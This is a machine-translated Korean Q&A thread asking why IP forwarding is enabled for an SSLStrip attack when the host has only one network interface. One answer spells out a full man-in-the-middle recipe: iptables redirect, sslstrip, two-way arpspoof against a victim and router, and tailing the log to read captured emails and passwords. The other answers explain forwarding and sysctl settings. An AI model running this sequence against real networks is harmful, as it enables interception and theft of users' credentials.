
SSLStrip
공격 에서는 IP forwarding
다음 명령을 사용하여 활성화해야 합니다.
echo 1 > /proc/sys/net/ipv4/ip_forward
나는 이 명령을 통해 호스트가 두 네트워크 간에 패킷을 전달하는 라우터 역할을 할 수 있다는 것을 이해합니다. 이것이 나의 혼란입니다. 네트워크 인터페이스가 하나만 있는데 왜 IP 전달을 구성할 수 있나요? eth0
내 상자에 있는 건 이게 어떻게 작동하는 걸까요?
인터페이스가 하나만 있을 때 전달이 작동합니까? 우리 둘은 있어야 하지 않나요?
답변1
NIC(귀하의 경우 eth0)가 물리적으로 연결된 네트워크만 고려하고 있기 때문에 혼란스럽습니다. 그러나 컴퓨터는 더 많은 네트워크에 액세스할 수 있습니다.
귀하의 컴퓨터에서 IP 전달을 활성화하면 귀하가 의도하지 않은 패킷을 받았을 때 귀하에게 알려줄 것입니다.앞으로이를 버리는 대신 대상(또는 다음 홉)으로 이동합니다. 이 경우 귀하의 컴퓨터는 다음과 같이 작동합니다.게이트웨이그 특정 목적지로.
답변2
포트 전달을 활성화하면 귀하의 컴퓨터 IP(eth0)를 게이트웨이로 구성하고 귀하에게 패킷을 보낼 수 있습니다. iptables FORWARD 링크가 이러한 패킷을 수락하면 해당 패킷을 대상으로 전달하게 됩니다.
답변3
root@kali# echo 1 > /proc/sys/net/ipv4/ip_forward
root@kali# iptables -t nat -A PREROUTING --dport 80 -j REDIRECT --to-port 1000
root@kali# sslstrip -a -l 1000 -k
이제 새 터미널에서 쓰기
root@kali# arpspoof -i eth0 victimip routerip
새 터미널에 작성하십시오.
root@kali# arpspoof -i eth0 routerip victimip
실시간 이메일과 비밀번호를 보려면 다른 터미널을 작성해야 합니다.
root@kali# tail -f sslstrip.log
알림: 모든 터미널을 닫아서는 안 됩니다.
출력 번호 1은 IP 전달이 활성화되었음을 나타냅니다. 위의 값은 Linux proc 파일 시스템, 보다 정확하게는 실제 파일 /proc/sys/net/ipv4/ip_forward
파일에서 읽습니다.
# cat /proc/sys/net/ipv4/ip_forward
1
실행 중인 Linux 시스템에서 IP 전달을 비활성화하려면 다음을 실행합니다.
# echo 0 > /proc/sys/net/ipv4/ip_forward
위의 변경 사항은 재부팅 후에도 유지되지 않습니다. Linux 시스템에서 IP 전달을 영구적으로 비활성화하려면 /etc/sysctl.conf
다음 줄을 편집하고 추가합니다.
net.ipv4.ip_forward = 0
Linux에서 IP 전달을 활성화하는 과정은 위의 비활성화와 동일하지만 숫자 1을 사용하여 IP 전달을 활성화합니다.
# echo 1 > /proc/sys/net/ipv4/ip_forward
변경 사항을 영구적으로 적용하려면 edit 에 다음 줄을 삽입하거나 편집하세요 /etc/sysctl.conf
.
net.ipv4.ip_forward = 1